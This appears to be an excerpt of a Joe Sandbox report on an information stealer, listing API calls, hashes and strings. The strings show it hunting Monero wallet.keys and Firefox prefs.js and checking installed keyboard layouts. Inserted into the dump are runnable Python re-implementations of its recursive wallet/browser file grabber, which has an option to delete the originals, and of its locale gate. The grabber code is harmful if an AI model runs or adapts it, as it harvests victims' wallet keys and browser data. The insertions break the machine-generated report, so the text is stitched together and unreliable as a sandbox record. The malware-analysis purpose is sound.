                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\*.*
                      • API String ID: 180737720-1013718255
                      • Opcode ID: 23722c655a24382802fb93bc8222b32c54d36af3d35596fc9500d9544e84a1d8
                      • Instruction ID: e3e28e255a7afee9c9240c86800331f2da54a1659a9b1c24e3c6312d3b795ef8
                      • Opcode Fuzzy Hash: 23722c655a24382802fb93bc8222b32c54d36af3d35596fc9500d9544e84a1d8
                      • Instruction Fuzzy Hash: 30E1FF72951118EAFB55FB60DC56EEE737CAF54300F4041A9B50A62092EF386F8ACF52
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007515B8,00750D96), ref: 0073F71E
                      • StrCmpCA.SHLWAPI(?,007515BC), ref: 0073F76F
                      • StrCmpCA.SHLWAPI(?,007515C0), ref: 0073F785
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0073FAB1
                      • FindClose.KERNEL32(000000FF), ref: 0073FAC3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: prefs.js
                      • API String ID: 3334442632-3783873740
                      • Opcode ID: 22777a582ca6bae828d7c81e6555fdad5cea125cae5ca008191d386da95ad4d5
                      • Instruction ID: 948bdc1b26fad37a3a4c2b7bfea590bf62f7bfd5c490e62c9f730e4f416462ae
                      • Opcode Fuzzy Hash: 22777a582ca6bae828d7c81e6555fdad5cea125cae5ca008191d386da95ad4d5
                      • Instruction Fuzzy Hash: 53B13671950108EBEB25FF60DC5ABEE7379AF54300F4085A8E40A96152EF386B49CF92
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0075510C,?,?,?,007551B4,?,?,00000000,?,00000000), ref: 00731923
                      • StrCmpCA.SHLWAPI(?,0075525C), ref: 00731973
                      • StrCmpCA.SHLWAPI(?,00755304), ref: 00731989
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00731D40
                      • DeleteFileA.KERNEL32(00000000), ref: 00731DCA
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00731E20
                      • FindClose.KERNEL32(000000FF), ref: 00731E32
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 1415058207-1173974218
                      • Opcode ID: a2f38f4283c71340c8a087c516c2b6c9af6f531c2cea88d400fc751084b193d7
                      • Instruction ID: 310d5e9f3f078336d410ec2ea9a728133d41dcd7168fc3eb74b0810e3ea8a96e
                      • Opcode Fuzzy Hash: a2f38f4283c71340c8a087c516c2b6c9af6f531c2cea88d400fc751084b193d7
                      • Instruction Fuzzy Hash: E3120071950118FBEB15FB60CC9AAEE737CAF54300F4145A9B50A62091EF786F89CF91
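The FindFirstFileA / StrCmpCA / FindNextFileA / FindClose records in this section are one directory walker instantiated for different targets: wsprintfA builds the search mask from the "%s\*.*" format, every entry is compared against two adjacent string constants (most likely "." and "..", the report shows only their addresses), matches are joined with "%s\%s" and recursed into, and the variant at 00731923 additionally calls CopyFileA with bFailIfExists set to 1 and then DeleteFileA. The Python below is an added model of that loop written for this report; it is not code from the sample or from Joe Sandbox. The target names wallet.keys (under \Monero) and prefs.js come from the strings listed in the records; the example tree, the staging directory, the recursion limit, and the assumption that the delete applies to the source file right after the copy are constructed for the demo.

```python
import os
import shutil
import tempfile

# File names the walker looks for, taken from the strings in the report.
TARGETS = {"wallet.keys", "prefs.js"}
# The two back-to-back StrCmpCA compares in every walker variant (inferred;
# the report shows only the string addresses, not their contents).
DOT_ENTRIES = (".", "..")


def build_target_path(base: str, suffix: str) -> str:
    """The lstrlen/lstrcpy/lstrcat subcalls: base path + a literal such as
    '\\Monero\\wallet.keys'.  os.path.join keeps this runnable on any OS."""
    return os.path.join(base, *suffix.strip("\\").split("\\"))


def find_files(directory: str):
    """Emulates FindFirstFileA/FindNextFileA on '<directory>\\*.*' (the
    wsprintfA '%s\\*.*' format).  A real Windows listing yields '.' and '..'
    first, which is why the walker compares every name against both."""
    yield from DOT_ENTRIES
    yield from sorted(os.listdir(directory))


def walk_and_grab(directory, staging, targets=TARGETS, delete_after=False,
                  depth=0, max_depth=8):
    """Recursive grabber loop.  max_depth is an assumption added for safety;
    the report shows no depth limit.  Returns the source paths copied."""
    grabbed = []
    for name in find_files(directory):
        if name in DOT_ENTRIES:                  # StrCmpCA(name, ".") / (name, "..")
            continue
        full = os.path.join(directory, name)     # wsprintfA('%s\\%s', directory, name)
        if os.path.isdir(full):
            if depth < max_depth:
                grabbed += walk_and_grab(full, staging, targets, delete_after,
                                         depth + 1, max_depth)
            continue
        if name.lower() in targets:
            dest = os.path.join(staging, name)
            if not os.path.exists(dest):         # CopyFileA(src, dst, bFailIfExists=TRUE)
                shutil.copyfile(full, dest)
                grabbed.append(full)
            if delete_after:                     # DeleteFileA in the 00731923 variant;
                os.remove(full)                  # assumed to target the source (not visible in the API list)
    return grabbed


def build_sample_tree(base: str) -> None:
    """Constructed directory tree for the demo (not data from the report)."""
    files = {
        "AppData/Roaming/Monero/wallet.keys": b"constructed wallet key material",
        "AppData/Roaming/Mozilla/Firefox/Profiles/x.default/prefs.js": b'user_pref("a", 1);',
        "AppData/Roaming/Mozilla/Firefox/Profiles/x.default/cookies.sqlite": b"SQLite format 3",
        "Documents/notes.txt": b"nothing of interest",
    }
    for rel, data in files.items():
        path = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)


def demo(delete_after=False):
    """Run the walker over the constructed tree.
    Returns (grabbed relative paths, staged names, target files left on disk)."""
    with tempfile.TemporaryDirectory() as tmp:
        victim = os.path.join(tmp, "victim")
        staging = os.path.join(tmp, "staging")
        os.makedirs(victim)
        os.makedirs(staging)
        build_sample_tree(victim)
        grabbed = walk_and_grab(victim, staging, delete_after=delete_after)
        rel = sorted(os.path.relpath(p, victim).replace(os.sep, "/") for p in grabbed)
        remaining = sum(1 for _, _, names in os.walk(victim) for n in names if n in TARGETS)
        return rel, sorted(os.listdir(staging)), remaining


if __name__ == "__main__":
    print(demo())
    print(demo(delete_after=True))
```

The same skeleton is what an analyst should expect to see in each of the walker records: the per-target strings (wallet.keys, prefs.js, the "\*.*" mask) are the only thing that changes between them, so extracting those strings from the dump is the fastest way to recover the full grab list.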
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00750C2E), ref: 0073DE5E
                      • StrCmpCA.SHLWAPI(?,007514C8), ref: 0073DEAE
                      • StrCmpCA.SHLWAPI(?,007514CC), ref: 0073DEC4
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0073E3E0
                      • FindClose.KERNEL32(000000FF), ref: 0073E3F2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                      • String ID: \*.*
                      • API String ID: 2325840235-1173974218
                      • Opcode ID: 0428cc7f4dddb61bd65cfa309a8ae118e80317d9a65002f97434458490155854
                      • Instruction ID: 43ad3de068561cc51e74635bd97923e93ba1983d4f4b7ed39cb7853d7c6a3f7a
                      • Opcode Fuzzy Hash: 0428cc7f4dddb61bd65cfa309a8ae118e80317d9a65002f97434458490155854
                      • Instruction Fuzzy Hash: 39F1BF71954118EAEB16EB60DC99EEE737CFF54304F8141E9A40A62091EF386F89CF52
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007514B0,00750C2A), ref: 0073DAEB
                      • StrCmpCA.SHLWAPI(?,007514B4), ref: 0073DB33
                      • StrCmpCA.SHLWAPI(?,007514B8), ref: 0073DB49
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0073DDCC
                      • FindClose.KERNEL32(000000FF), ref: 0073DDDE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID:
                      • API String ID: 3334442632-0
                      • Opcode ID: 954da46994f64ed514756002bc63c089c625e3720ed5fd9eb1d5f012a49b707a
                      • Instruction ID: 0a3a41a023dc791a8730fdbf4317286e0c6f9536161bf8526689472fab7ab1cb
                      • Opcode Fuzzy Hash: 954da46994f64ed514756002bc63c089c625e3720ed5fd9eb1d5f012a49b707a
                      • Instruction Fuzzy Hash: 7F9146B2950104EBEB15FB70EC5A9ED737DAB84300F408568F90A96141EF3C9B59CB93
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 'Msf$8_I$Jv/$Q8}w$hJo7$lJo7$pt7Z$zY{s$okL
                      • API String ID: 0-2424283790
                      • Opcode ID: 5f5ccc8b945a9a36d0c49501c4e72d33d6530fb7b5aa4460808f97fe6f49e58c
                      • Instruction ID: 8aa5b15d82ecefde06c16a76741daee4eface6c6f9a849b295d416c27d940cae
                      • Opcode Fuzzy Hash: 5f5ccc8b945a9a36d0c49501c4e72d33d6530fb7b5aa4460808f97fe6f49e58c
                      • Instruction Fuzzy Hash: D0B215B3A0C2049FE304AE2DEC8567ABBE5EF94720F1A493DEAC4C7744E63558418797
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      • GetKeyboardLayoutList.USER32(00000000,00000000,007505AF), ref: 00747BE1
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00747BF9
                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00747C0D
                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00747C62
                      • LocalFree.KERNEL32(00000000), ref: 00747D22
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                      • String ID: /
                      • API String ID: 3090951853-4001269591
                      • Opcode ID: 5aad05b861b8f67d7b8e89cd07a4b4f9e202b9495bad757aba6e8704bec68f7b
                      • Instruction ID: 5b78bbf0b36a3c56ddd5966f168c2ca906036524e80e61ccc42a3cfe5c8dc36d
                      • Opcode Fuzzy Hash: 5aad05b861b8f67d7b8e89cd07a4b4f9e202b9495bad757aba6e8704bec68f7b
                      • Instruction Fuzzy Hash: E9413C71954218EBDB24DF94DC99BEEB3B8FF44700F204199E50962291DB782F85CFA1
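The record at 00747BE1 to 00747D22 is the locale gate: GetKeyboardLayoutList(0, NULL) to get the number of installed layouts, LocalAlloc with flag 0x40 (LPTR) for the buffer, a second GetKeyboardLayoutList to fill it, GetLocaleInfoA with LCType 2 (LOCALE_SABBREVLANGNAME) and a 0x200-byte buffer per layout, then a comparison against a "/"-separated list, and LocalFree. The Python below is an added model of that logic written for this report, not code from the sample or from Joe Sandbox. The LANGID values and three-letter names in the lookup table are the documented Windows values, but the table itself, the constructed host object and above all the block list are assumptions: the report shows only the "/" separator, not which languages the sample refuses to run on.

```python
LOCALE_SABBREVLANGNAME = 0x0002   # the 00000002 argument at 00747C62

# Stand-in for GetLocaleInfoA(lcid, LOCALE_SABBREVLANGNAME, ...).  The LANGIDs
# and three-letter names are the documented Windows values; the table only
# covers what this demo needs and is constructed here.
ABBREV_LANG_NAME = {0x0409: "ENU", 0x0407: "DEU", 0x0419: "RUS", 0x0422: "UKR"}

# ASSUMPTION: the report shows only the "/" separator (String ID "/"), not the
# list the sample compares against.  This list is illustrative only.
ASSUMED_BLOCKLIST = "RUS/UKR"


class FakeUser32:
    """Constructed host exposing the two-call GetKeyboardLayoutList pattern."""

    def __init__(self, installed_hkls):
        self._hkls = list(installed_hkls)

    def GetKeyboardLayoutList(self, n_buff, buffer):
        if n_buff == 0 or buffer is None:     # size query: (0, NULL) at 00747BE1
            return len(self._hkls)
        count = min(n_buff, len(self._hkls))  # fill call at 00747C0D
        buffer[:count] = self._hkls[:count]
        return count


def get_locale_info_a(lcid, lctype):
    """Minimal GetLocaleInfoA stand-in; only LOCALE_SABBREVLANGNAME is modelled."""
    if lctype != LOCALE_SABBREVLANGNAME:
        raise NotImplementedError(lctype)
    return ABBREV_LANG_NAME.get(lcid, "")


def installed_layout_names(user32):
    """Count, allocate, fill, then resolve each layout to its language name."""
    count = user32.GetKeyboardLayoutList(0, None)
    buf = [0] * count                         # LocalAlloc(LPTR=0x40, count * sizeof(HKL))
    user32.GetKeyboardLayoutList(count, buf)
    # The low word of an HKL is the language identifier; that is the LCID the
    # sample hands to GetLocaleInfoA for each entry.
    names = [get_locale_info_a(hkl & 0xFFFF, LOCALE_SABBREVLANGNAME) for hkl in buf]
    return names                              # LocalFree(buf) is implicit here


def locale_gate(user32, blocklist=ASSUMED_BLOCKLIST):
    """Returns the installed names, which ones matched the list, and whether
    the sample would stop before stealing anything."""
    names = installed_layout_names(user32)
    blocked = set(blocklist.split("/"))
    hits = sorted(set(names) & blocked)
    return {"layouts": names, "hits": hits, "abort": bool(hits)}


if __name__ == "__main__":
    print(locale_gate(FakeUser32([0x04090409])))              # English only
    print(locale_gate(FakeUser32([0x04090409, 0x04190419])))  # English + Russian
```

Two practical consequences: a sandbox that only has an English layout installed will pass this gate, while an analysis VM with one of the listed layouts added will see the sample exit early and produce an empty run, so the keyboard layout set should be part of the run configuration you record. The actual list has to be read from the dump; the API list above gives no more than the separator.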
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 7Ot?$7Ot?$Rcj$UG;}$arw{$r%'^$u]"
                      • API String ID: 0-3911642341
                      • Opcode ID: 95a9eb96aeee402ddc1d5484956e442c76a4ee7b228065947436aa8c42398b6a
                      • Instruction ID: 683e8ee7140be3ffed3063fd29d7ac1e37ef6c393b99a5d49f55ccbb7d074d95
                      • Opcode Fuzzy Hash: 95a9eb96aeee402ddc1d5484956e442c76a4ee7b228065947436aa8c42398b6a
                      • Instruction Fuzzy Hash: 9BB207F3A082149FE3046E2DEC8567ABBE9EF94320F1A493DE6C5C3744EA7558018797
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
